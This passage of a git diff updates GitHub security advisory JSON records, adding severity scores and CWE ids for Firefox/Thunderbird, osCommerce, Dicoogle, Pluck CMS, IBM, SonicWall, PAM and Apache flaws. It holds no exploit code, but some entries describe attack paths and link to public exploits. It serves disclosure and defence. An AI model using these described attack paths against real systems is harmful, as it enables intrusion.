b/advisories/unreviewed/2025/07/GHSA-2fhm-pcv6-vcx9/GHSA-2fhm-pcv6-vcx9.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2fhm-pcv6-vcx9", - "modified": "2025-07-22T21:31:15Z", + "modified": "2025-07-23T15:31:10Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-8028" ], "details": "On arm64, a WASM `br_table` instruction with a lot of entries could lead to the label being too far from the instruction causing truncation and incorrect computation of the branch address. This vulnerability affects Firefox < 141, Firefox ESR < 115.26, Firefox ESR < 128.13, Firefox ESR < 140.1, Thunderbird < 141, Thunderbird < 128.13, and Thunderbird < 140.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -48,8 +53,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-1332" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:49Z" diff --git a/advisories/unreviewed/2025/07/GHSA-2qpp-9v9c-5979/GHSA-2qpp-9v9c-5979.json b/advisories/unreviewed/2025/07/GHSA-2qpp-9v9c-5979/GHSA-2qpp-9v9c-5979.json index 7009532914340..3dd190ece7bac 100644 --- a/advisories/unreviewed/2025/07/GHSA-2qpp-9v9c-5979/GHSA-2qpp-9v9c-5979.json +++ b/advisories/unreviewed/2025/07/GHSA-2qpp-9v9c-5979/GHSA-2qpp-9v9c-5979.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-120" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2025/07/GHSA-3q2p-xj33-xm8j/GHSA-3q2p-xj33-xm8j.json b/advisories/unreviewed/2025/07/GHSA-3q2p-xj33-xm8j/GHSA-3q2p-xj33-xm8j.json index 993a1d16f32d5..966615e5701db 100644 --- a/advisories/unreviewed/2025/07/GHSA-3q2p-xj33-xm8j/GHSA-3q2p-xj33-xm8j.json +++ b/advisories/unreviewed/2025/07/GHSA-3q2p-xj33-xm8j/GHSA-3q2p-xj33-xm8j.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3q2p-xj33-xm8j", - "modified": "2025-07-22T21:31:15Z", + "modified": "2025-07-23T15:31:10Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-8030" ], "details": "Insufficient escaping in the “Copy as cURL” feature could potentially be used to trick a user into executing unexpected code. This vulnerability affects Firefox < 141, Firefox ESR < 128.13, Firefox ESR < 140.1, Thunderbird < 141, Thunderbird < 128.13, and Thunderbird < 140.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -44,8 +49,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:50Z" diff --git a/advisories/unreviewed/2025/07/GHSA-55r3-2rh8-427f/GHSA-55r3-2rh8-427f.json b/advisories/unreviewed/2025/07/GHSA-55r3-2rh8-427f/GHSA-55r3-2rh8-427f.json new file mode 100644 index 0000000000000..dc2aa40d0045d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-55r3-2rh8-427f/GHSA-55r3-2rh8-427f.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-55r3-2rh8-427f", + "modified": "2025-07-23T15:31:13Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2025-46099" + ], + "details": "In Pluck CMS 4.7.20-dev, an authenticated attacker can upload or create a crafted PHP file under the albums module directory and access it via the module routing logic in albums.site.php, resulting in arbitrary command execution through a GET parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46099" + }, + { + "type": "WEB", + "url": "https://github.com/0xC4J/CVE-Lists/blob/main/CVE-2025-46099/CVE-2025-46099.md" + }, + { + "type": "WEB", + "url": "http://pluck.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T14:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-58gx-pg7f-pm8j/GHSA-58gx-pg7f-pm8j.json b/advisories/unreviewed/2025/07/GHSA-58gx-pg7f-pm8j/GHSA-58gx-pg7f-pm8j.json index 0528d8eb028e8..1ab0353969a41 100644 --- a/advisories/unreviewed/2025/07/GHSA-58gx-pg7f-pm8j/GHSA-58gx-pg7f-pm8j.json +++ b/advisories/unreviewed/2025/07/GHSA-58gx-pg7f-pm8j/GHSA-58gx-pg7f-pm8j.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-120" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2025/07/GHSA-5g22-6w6r-pr2m/GHSA-5g22-6w6r-pr2m.json b/advisories/unreviewed/2025/07/GHSA-5g22-6w6r-pr2m/GHSA-5g22-6w6r-pr2m.json index 2ec74dc44e95d..36879d3722811 100644 --- a/advisories/unreviewed/2025/07/GHSA-5g22-6w6r-pr2m/GHSA-5g22-6w6r-pr2m.json +++ b/advisories/unreviewed/2025/07/GHSA-5g22-6w6r-pr2m/GHSA-5g22-6w6r-pr2m.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5g22-6w6r-pr2m", - "modified": "2025-07-22T21:31:15Z", + "modified": "2025-07-23T15:31:12Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-8036" ], "details": "Thunderbird cached CORS preflight responses across IP address changes. This allowed circumventing CORS with DNS rebinding. This vulnerability affects Firefox < 141, Firefox ESR < 140.1, Thunderbird < 141, and Thunderbird < 140.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-350" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:50Z" diff --git a/advisories/unreviewed/2025/07/GHSA-5xpm-7rr7-rcx4/GHSA-5xpm-7rr7-rcx4.json b/advisories/unreviewed/2025/07/GHSA-5xpm-7rr7-rcx4/GHSA-5xpm-7rr7-rcx4.json new file mode 100644 index 0000000000000..082623d941966 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-5xpm-7rr7-rcx4/GHSA-5xpm-7rr7-rcx4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5xpm-7rr7-rcx4", + "modified": "2025-07-23T15:31:14Z", + "published": "2025-07-23T15:31:14Z", + "aliases": [ + "CVE-2025-33077" + ], + "details": "IBM Engineering Systems Design Rhapsody 9.0.2, 10.0, and 10.0.1 is vulnerable to a stack-based buffer overflow, caused by improper bounds checking. A local user could overflow the buffer and execute arbitrary code on the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33077" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7240375" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T15:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-657p-g22x-9v25/GHSA-657p-g22x-9v25.json b/advisories/unreviewed/2025/07/GHSA-657p-g22x-9v25/GHSA-657p-g22x-9v25.json index f2822cb8e724b..49946aa7e9ecf 100644 --- a/advisories/unreviewed/2025/07/GHSA-657p-g22x-9v25/GHSA-657p-g22x-9v25.json +++ b/advisories/unreviewed/2025/07/GHSA-657p-g22x-9v25/GHSA-657p-g22x-9v25.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-657p-g22x-9v25", - "modified": "2025-07-22T21:31:15Z", + "modified": "2025-07-23T15:31:10Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-8029" ], "details": "Thunderbird executed `javascript:` URLs when used in `object` and `embed` tags. This vulnerability affects Firefox < 141, Firefox ESR < 128.13, Firefox ESR < 140.1, Thunderbird < 141, Thunderbird < 128.13, and Thunderbird < 140.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -44,8 +49,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-80" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:50Z" diff --git a/advisories/unreviewed/2025/07/GHSA-6fjq-cmcf-h48q/GHSA-6fjq-cmcf-h48q.json b/advisories/unreviewed/2025/07/GHSA-6fjq-cmcf-h48q/GHSA-6fjq-cmcf-h48q.json new file mode 100644 index 0000000000000..04416b6110c96 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6fjq-cmcf-h48q/GHSA-6fjq-cmcf-h48q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6fjq-cmcf-h48q", + "modified": "2025-07-23T15:31:13Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2018-25113" + ], + "details": "An unauthenticated path traversal vulnerability exists in Dicoogle PACS Web Server version 2.5.0 and possibly earlier. The vulnerability allows remote attackers to read arbitrary files on the underlying system by sending a crafted request to the /exportFile endpoint using the UID parameter. Successful exploitation can reveal sensitive files accessible by the web server user.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25113" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/http/dicoogle_traversal.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/45007" + }, + { + "type": "WEB", + "url": "https://www.fortiguard.com/encyclopedia/ips/46527/dicoogle-pacs-web-server-directory-traversal" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/dicoogle-pacs-web-server-path-traversal" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T14:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7hjh-7hp4-wr4c/GHSA-7hjh-7hp4-wr4c.json b/advisories/unreviewed/2025/07/GHSA-7hjh-7hp4-wr4c/GHSA-7hjh-7hp4-wr4c.json new file mode 100644 index 0000000000000..053c5951287d7 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7hjh-7hp4-wr4c/GHSA-7hjh-7hp4-wr4c.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7hjh-7hp4-wr4c", + "modified": "2025-07-23T15:31:13Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2018-25114" + ], + "details": "A remote code execution vulnerability exists within osCommerce Online Merchant version 2.3.4.1 due to insecure default configuration and missing authentication in the installer workflow. By default, the /install/ directory remains accessible after installation. An unauthenticated attacker can invoke install_4.php, submit crafted POST data, and inject arbitrary PHP code into the configure.php file. When the application later includes this file, the injected payload is executed, resulting in full server-side compromise.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25114" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/44374" + }, + { + "type": "WEB", + "url": "https://www.oscommerce.com" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/oscommerce-installer-unauth-config-file-injection-php-code-execution" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T14:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7w4f-rr94-7cwp/GHSA-7w4f-rr94-7cwp.json b/advisories/unreviewed/2025/07/GHSA-7w4f-rr94-7cwp/GHSA-7w4f-rr94-7cwp.json new file mode 100644 index 0000000000000..657756cc7f4a4 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7w4f-rr94-7cwp/GHSA-7w4f-rr94-7cwp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7w4f-rr94-7cwp", + "modified": "2025-07-23T15:31:14Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2025-36116" + ], + "details": "IBM Db2 Mirror for i 7.4, 7.5, and 7.6 GUI is affected by cross-site WebSocket hijacking vulnerability. By sending a specially crafted request, an unauthenticated malicious actor could exploit this vulnerability to sniff an existing WebSocket connection to then remotely perform operations that the user is not allowed to perform.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36116" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7240351" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1385" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T15:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9c9q-24rh-frhg/GHSA-9c9q-24rh-frhg.json b/advisories/unreviewed/2025/07/GHSA-9c9q-24rh-frhg/GHSA-9c9q-24rh-frhg.json new file mode 100644 index 0000000000000..fc02937ffec84 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9c9q-24rh-frhg/GHSA-9c9q-24rh-frhg.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9c9q-24rh-frhg", + "modified": "2025-07-23T15:31:13Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2025-40596" + ], + "details": "A Stack-based buffer overflow vulnerability in the SMA100 series web interface allows remote, unauthenticated attacker to cause Denial of Service (DoS) or potentially results in code execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40596" + }, + { + "type": "WEB", + "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0012" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T15:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9p33-984h-cpxw/GHSA-9p33-984h-cpxw.json b/advisories/unreviewed/2025/07/GHSA-9p33-984h-cpxw/GHSA-9p33-984h-cpxw.json new file mode 100644 index 0000000000000..f81afd7c6474b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9p33-984h-cpxw/GHSA-9p33-984h-cpxw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9p33-984h-cpxw", + "modified": "2025-07-23T15:31:13Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2025-33076" + ], + "details": "IBM Engineering Systems Design Rhapsody 9.0.2, 10.0, and 10.0.1 is vulnerable to a stack-based buffer overflow, caused by improper bounds checking. A local user could overflow the buffer and execute arbitrary code on the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33076" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7240368" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T15:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9pr6-9rp3-fq9v/GHSA-9pr6-9rp3-fq9v.json b/advisories/unreviewed/2025/07/GHSA-9pr6-9rp3-fq9v/GHSA-9pr6-9rp3-fq9v.json new file mode 100644 index 0000000000000..708bdb37075ba --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9pr6-9rp3-fq9v/GHSA-9pr6-9rp3-fq9v.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9pr6-9rp3-fq9v", + "modified": "2025-07-23T15:31:13Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2025-40599" + ], + "details": "An authenticated arbitrary file upload vulnerability exists in the SMA 100 series web management interface. A remote attacker with administrative privileges can exploit this flaw to upload arbitrary files to the system, potentially leading to remote code execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40599" + }, + { + "type": "WEB", + "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0014" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T14:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-c53g-5r6w-mwwf/GHSA-c53g-5r6w-mwwf.json b/advisories/unreviewed/2025/07/GHSA-c53g-5r6w-mwwf/GHSA-c53g-5r6w-mwwf.json new file mode 100644 index 0000000000000..edcb5daa661b9 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-c53g-5r6w-mwwf/GHSA-c53g-5r6w-mwwf.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c53g-5r6w-mwwf", + "modified": "2025-07-23T15:31:13Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2025-33020" + ], + "details": "IBM Engineering Systems Design Rhapsody 9.0.2, 10.0, and 10.0.1 transmits sensitive information without encryption that could allow an attacker to obtain highly sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33020" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7240374" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-311" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T15:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-cg9q-xmf9-7r6w/GHSA-cg9q-xmf9-7r6w.json b/advisories/unreviewed/2025/07/GHSA-cg9q-xmf9-7r6w/GHSA-cg9q-xmf9-7r6w.json new file mode 100644 index 0000000000000..f0c78cd64b0a8 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-cg9q-xmf9-7r6w/GHSA-cg9q-xmf9-7r6w.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cg9q-xmf9-7r6w", + "modified": "2025-07-23T15:31:14Z", + "published": "2025-07-23T15:31:14Z", + "aliases": [ + "CVE-2025-6018" + ], + "details": "A Local Privilege Escalation (LPE) vulnerability has been discovered in pam-config within Linux Pluggable Authentication Modules (PAM). This flaw allows an unprivileged local attacker (for example, a user logged in via SSH) to obtain the elevated privileges normally reserved for a physically present, \"allow_active\" user. The highest risk is that the attacker can then perform all allow_active yes Polkit actions, which are typically restricted to console users, potentially gaining unauthorized control over system configurations, services, or other sensitive operations.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6018" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-6018" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2372693" + }, + { + "type": "WEB", + "url": "https://bugzilla.suse.com/show_bug.cgi?id=1243226" + }, + { + "type": "WEB", + "url": "https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T15:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-cjqj-vhhm-xq5x/GHSA-cjqj-vhhm-xq5x.json b/advisories/unreviewed/2025/07/GHSA-cjqj-vhhm-xq5x/GHSA-cjqj-vhhm-xq5x.json new file mode 100644 index 0000000000000..813dbc8abdc22 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-cjqj-vhhm-xq5x/GHSA-cjqj-vhhm-xq5x.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cjqj-vhhm-xq5x", + "modified": "2025-07-23T15:31:13Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2025-54090" + ], + "details": "A bug in Apache HTTP Server 2.4.64 results in all \"RewriteCond expr ...\" tests evaluating as \"true\".\n\n\n\nUsers are recommended to upgrade to version 2.4.65, which fixes the issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54090" + }, + { + "type": "WEB", + "url": "https://httpd.apache.org/security/vulnerabilities_24.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-253" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T14:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-cv9p-3pfj-w864/GHSA-cv9p-3pfj-w864.json b/advisories/unreviewed/2025/07/GHSA-cv9p-3pfj-w864/GHSA-cv9p-3pfj-w864.json index 4905b6d5a8712..42b724002e2ef 100644 --- a/advisories/unreviewed/2025/07/GHSA-cv9p-3pfj-w864/GHSA-cv9p-3pfj-w864.json +++ b/advisories/unreviewed/2025/07/GHSA-cv9p-3pfj-w864/GHSA-cv9p-3pfj-w864.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cv9p-3pfj-w864", - "modified": "2025-07-22T21:31:16Z", + "modified": "2025-07-23T15:31:12Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-8038" ], "details": "Thunderbird ignored paths when checking the validity of navigations in a frame. This vulnerability affects Firefox < 141, Firefox ESR < 140.1, Thunderbird < 141, and Thunderbird < 140.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-345" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:50Z" diff --git a/advisories/unreviewed/2025/07/GHSA-fw75-5frq-vxhg/GHSA-fw75-5frq-vxhg.json b/advisories/unreviewed/2025/07/GHSA-fw75-5frq-vxhg/GHSA-fw75-5frq-vxhg.json index 345acc29f8732..cc0da9904d7a2 100644 --- a/advisories/unreviewed/2025/07/GHSA-fw75-5frq-vxhg/GHSA-fw75-5frq-vxhg.json +++ b/advisories/unreviewed/2025/07/GHSA-fw75-5frq-vxhg/GHSA-fw75-5frq-vxhg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-fw75-5frq-vxhg", - "modified": "2025-07-22T21:31:15Z", + "modified": "2025-07-23T15:31:12Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-8037" ], "details": "Setting a nameless cookie with an equals sign in the value shadowed other cookies. Even if the nameless cookie was set over HTTP and the shadowed cookie included the `Secure` attribute. This vulnerability affects Firefox < 141, Firefox ESR < 140.1, Thunderbird < 141, and Thunderbird < 140.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-614" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:50Z" diff --git a/advisories/unreviewed/2025/07/GHSA-gg2x-qqv2-xfhc/GHSA-gg2x-qqv2-xfhc.json b/advisories/unreviewed/2025/07/GHSA-gg2x-qqv2-xfhc/GHSA-gg2x-qqv2-xfhc.json index e8fda02652cf7..f66e2b2d76a65 100644 --- a/advisories/unreviewed/2025/07/GHSA-gg2x-qqv2-xfhc/GHSA-gg2x-qqv2-xfhc.json +++ b/advisories/unreviewed/2025/07/GHSA-gg2x-qqv2-xfhc/GHSA-gg2x-qqv2-xfhc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-gg2x-qqv2-xfhc", - "modified": "2025-07-22T21:31:16Z", + "modified": "2025-07-23T15:31:13Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-8039" ], "details": "In some cases search terms persisted in the URL bar even after navigating away from the search page. This vulnerability affects Firefox < 141, Firefox ESR < 140.1, Thunderbird < 141, and Thunderbird < 140.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:51Z" diff --git a/advisories/unreviewed/2025/07/GHSA-gwhg-pm8j-vgp3/GHSA-gwhg-pm8j-vgp3.json b/advisories/unreviewed/2025/07/GHSA-gwhg-pm8j-vgp3/GHSA-gwhg-pm8j-vgp3.json new file mode 100644 index 0000000000000..a1d1c91d4f9ea --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-gwhg-pm8j-vgp3/GHSA-gwhg-pm8j-vgp3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwhg-pm8j-vgp3", + "modified": "2025-07-23T15:31:13Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2025-4411" + ], + "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Dataprom Informatics PACS-ACSS allows Cross-Site Scripting (XSS).This issue affects PACS-ACSS: before 16.05.2025.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4411" + }, + { + "type": "WEB", + "url": 